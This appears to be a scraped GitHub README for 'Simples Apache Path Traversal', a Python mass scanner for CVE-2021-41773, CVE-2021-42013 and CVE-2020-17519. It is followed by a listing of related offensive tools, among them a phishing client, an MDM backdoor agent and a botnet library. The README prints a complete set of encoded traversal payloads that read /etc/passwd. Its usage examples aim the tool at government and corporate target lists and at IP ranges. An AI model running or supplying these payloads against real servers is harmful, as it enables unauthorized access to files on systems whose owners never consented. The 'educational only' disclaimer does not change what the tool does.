It's a simple tool for test vulnerability Apache Path Traversal

Overview

SimplesApachePathTraversal

Banner Simples Apache Path Traversal

Simples Apache Path Traversal

It's a simple tool for test vulnerability Apache Path Traversal
https://blog.mrcl0wn.com/2021/10/uma-simples-tool-para-apache-path.html

GPL License GitHub code size in bytes Python 3.8 Supported_OS Linux orange Supported OS Mac

Autor:    MrCl0wn
Blog:     https://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Email:    mrcl0wnlab\@\gmail.com

Gr33ts:
+ aCCESS Security Lab @exchangesec
   - Megarushing, Ofjaaaah, 5Ub5010, Gh05tPT, Hunt3rPl4nk

Path traversal (software bug)

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. 
The usual disclaimer applies, especially the fact that me (MrCl0wnLab) is not liable for any 
damages caused by direct or indirect use of the information or functionality provided by these 
programs. The author or any Internet provider bears NO responsibility for content or misuse 
of these programs or any derivatives thereof. By using these programs you accept the fact 
that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these 
programs is not MrCl0wnLab's responsibility.

This script checks for vulnerabilities

Commands

python main.py --file gov.br.txt  --thread 15
python main.py --file tesla.txt  --ssl
python main.py --range 192.168.15.1,192.168.15.100 --thread 30 
python main.py --file fbi.gov.txt  --thread 15 --timeout 3 
python main.py --file gov.ru.txt  --debug

Screenshots

Screenshot Screenshot

Flow to generate targets

Screenshot

Help

python main.py --help
 
                                   .,,
                                  (=\/\
                                   \=\/\
                                    \=\/\
                                     `=\/
                                        \                                                                                                                  
           simples [ APACHE ]
           ___      _   _       _____                                    _ 
          / _ \__ _| |_| |__   /__   \_ __ __ ___   _____ _ __ ___  __ _| |
         / /_)/ _` | __| '_ \    / /\/ '__/ _` \ \ / / _ \ '__/ __|/ _` | |
        / ___/ (_| | |_| | | |  / /  | | | (_| |\ V /  __/ |  \__ \ (_| | |
        \/    \__,_|\__|_| |_|  \/   |_|  \__,_| \_/ \___|_|  |___/\__,_|_|
                                                                   
              
                      By: MrCl0wn / https://blog.mrcl0wn.com
                                    https://twitter.com/MrCl0wnLab 
                                    https://github.com/MrCl0wnLab                                                                         
         
usage: tool [-h] [--file 
   
    ] [--range 
    
     ,
     
      ]
     
    
   
            [--thread <20>] [--ssl] [--timeout <5>] [--debug]

[!] Check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519
[!] File exploits: /assets/exploits.json
[!] Output: output/vuln.txt

python main.py --file gov.br.txt  --thread 15
python main.py --file tesla.txt  --ssl
python main.py --range 192.168.15.1,192.168.15.100 --thread 30 
python main.py --file fbi.gov.txt  --thread 15 --timeout 3 
python main.py --file gov.ru.txt  --debug

optional arguments:
  -h, --help            show this help message and exit
  --file 
   
          Input your target host lists
   
  --range 
   
    ,
    
   
                        Set range IP Eg.: 192.168.15.1,192.168.15.100
  --thread <20>, -t <20>
                        Eg. 20
  --ssl                 Enable request with SSL
  --timeout <5>         Set connection timeout
  --debug, -d           Enable debug mode

Tree

.
├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print01.png
│       └── print02.png
├── LICENSE
├── main.py
├── modules
│   ├── banner_mrclw.py
│   ├── color_mrclw.py
│   ├── debug_mrclw.py
│   ├── file_mrclw.py
│   ├── __init__.py
│   ├── request_mrclw.py
│   ├── shodan_mrclw.py
│   └── thread_mrclw.py
├── output
└── README.md

File exploit

assets/exploits.json

{
    "CVE-2021-41773": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "CVE-2021-42013-0": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd",
    "CVE-2021-42013-1": "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2021-42013-3": "/cgi-bin/.%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2021-42013-4":"/cgi-bin/%25%25%25%2e/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2020-17519-0":"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
    "CVE-2020-17519-1":"/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
}

Ref.

Owner
Mr. Cl0wn - H4ck1ng C0d3r
GED (Gambiarra, Exploit and Development ) / Member of Osint Brazuca Project
Mr. Cl0wn - H4ck1ng C0d3r
CVE-2021-26855: PoC (Not a HoneyPoC for once!)

Exch-CVE-2021-26855 ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker b

ZephrFish 24 Nov 14, 2022
Client script for the fisherman phishing tool

Client script for the fisherman phishing tool

Pushkar Raj 1 Feb 23, 2022
Orthrus is a macOS agent that uses Apple's MDM to backdoor a device using a malicious profile.

Orthrus is a macOS agent that uses Apple's MDM to backdoor a device using a malicious profile. It effectively runs its own MDM server and allows the operator to interface with it using Mythic.

Mythic Agents 37 Dec 06, 2022
Cisco RV110w UPnP stack overflow

Cisco RV110W UPnP 0day 分析 前言 最近UPnP比较火,恰好手里有一台Cisco RV110W,在2021年8月份思科官方公布了一个Cisco RV系列关于UPnP的0day,但是具体的细节并没有公布出来。于是想要用手中的设备调试挖掘一下这个漏洞,漏洞的公告可以在官网看到。 准

badmonkey 25 Nov 09, 2022
Password List Creator Simple !

Password List Creator Simple !

MR.D3F417 4 Jan 27, 2022
Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp

cve-2022-23131 cve-2022-23131 zabbix-saml-bypass-exp replace [zbx_signed_session

东方有鱼名为咸 135 Dec 14, 2022
Crowbar - A windows post exploitation tool

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

29 Nov 20, 2022
APKLeaks - Scanning APK file for URIs, endpoints & secrets.

APKLeaks - Scanning APK file for URIs, endpoints & secrets.

dw1 3.5k Jan 09, 2023
A dynamic multi-STL, multi-process OpenSCAD build system with autoplating support

scad-build This is a multi-STL OpenSCAD build system based around GNU make. It supports dynamic build targets, intelligent previews with user-defined

Jordan Mulcahey 1 Dec 21, 2021
A local Socks5 server written in python, used for integrating Multi-hop

proxy-Zata proxy-Zata v1.0 This is a local Socks5 server written in python, used for integrating Multi-hop (Socks4/Socks5/HTTP) forward proxy then pro

4 Feb 24, 2022
威胁情报播报

Threat-Broadcast 威胁情报播报 运行环境 项目介绍 从以下公开的威胁情报来源爬取并整合最新信息: 360:https://cert.360.cn/warning 奇安信:https://ti.qianxin.com/advisory/ 红后:https://redqueen.tj-u

东方有鱼名为咸 148 Nov 09, 2022
STATS305C: Applied Statistics III (Spring, 2022)

STATS305C: Applied Statistics III Instructor: Scott Linderman TA: Matt MacKay, James Yang Term: Spring 2022 Stanford University Course Description: Pr

Scott Linderman 14 Aug 11, 2022
A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)

MassDNS A high-performance DNS stub resolver MassDNS is a simple high-performance DNS stub resolver targeting those who seek to resolve a massive amou

B. Blechschmidt 2.5k Jan 07, 2023
Log4j exploit catcher, detect Log4Shell exploits and try to get payloads.

log4j_catcher Log4j exploit catcher, detect Log4Shell exploits and try to get payloads. This is a basic python server that listen on a port and logs i

EntropyQueen 17 Dec 20, 2021
Python tool for dumping flash via uboot reliably

Reliable Uboot Flash Dumper is a Python tool for dumping flash via uboot reliably. If you've ever had to dump flash via uboot and a serial connection and became frustrated about doing it several time

SecurityJon 25 May 10, 2022
CVE-2021-40346 integer overflow enables http smuggling

CVE-2021-40346-POC CVE-2021-40346 integer overflow enables http smuggling Reference: https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021

donky16 34 Nov 15, 2022
Log4j rce test environment and poc

log4jpwn log4j rce test environment See: https://www.lunasec.io/docs/blog/log4j-zero-day/ Experiments to trigger in various software products mentione

Leon Jacobs 307 Dec 24, 2022
A Python wrapper around the OpenSSL library

pyOpenSSL -- A Python wrapper around the OpenSSL library Note: The Python Cryptographic Authority strongly suggests the use of pyca/cryptography where

Python Cryptographic Authority 795 Dec 29, 2022
pybotnet - A Python Library for building Botnet , Trojan or BackDoor for windows and linux with Telegram control panel

pybotnet A Python Library for building botnet , trojan or backdoor for windows and linux with Telegram control panel Disclaimer: Please note that this

</oNion 181 Jan 02, 2023
Directory Traversal in Afterlogic webmail aurora and pro

CVE-2021-26294 Exploit Directory Traversal in Afterlogic webmail aurora and pro . Description: AfterLogic Aurora and WebMail Pro products with 7.7.9 a

Ashish Kunwar 8 Nov 09, 2022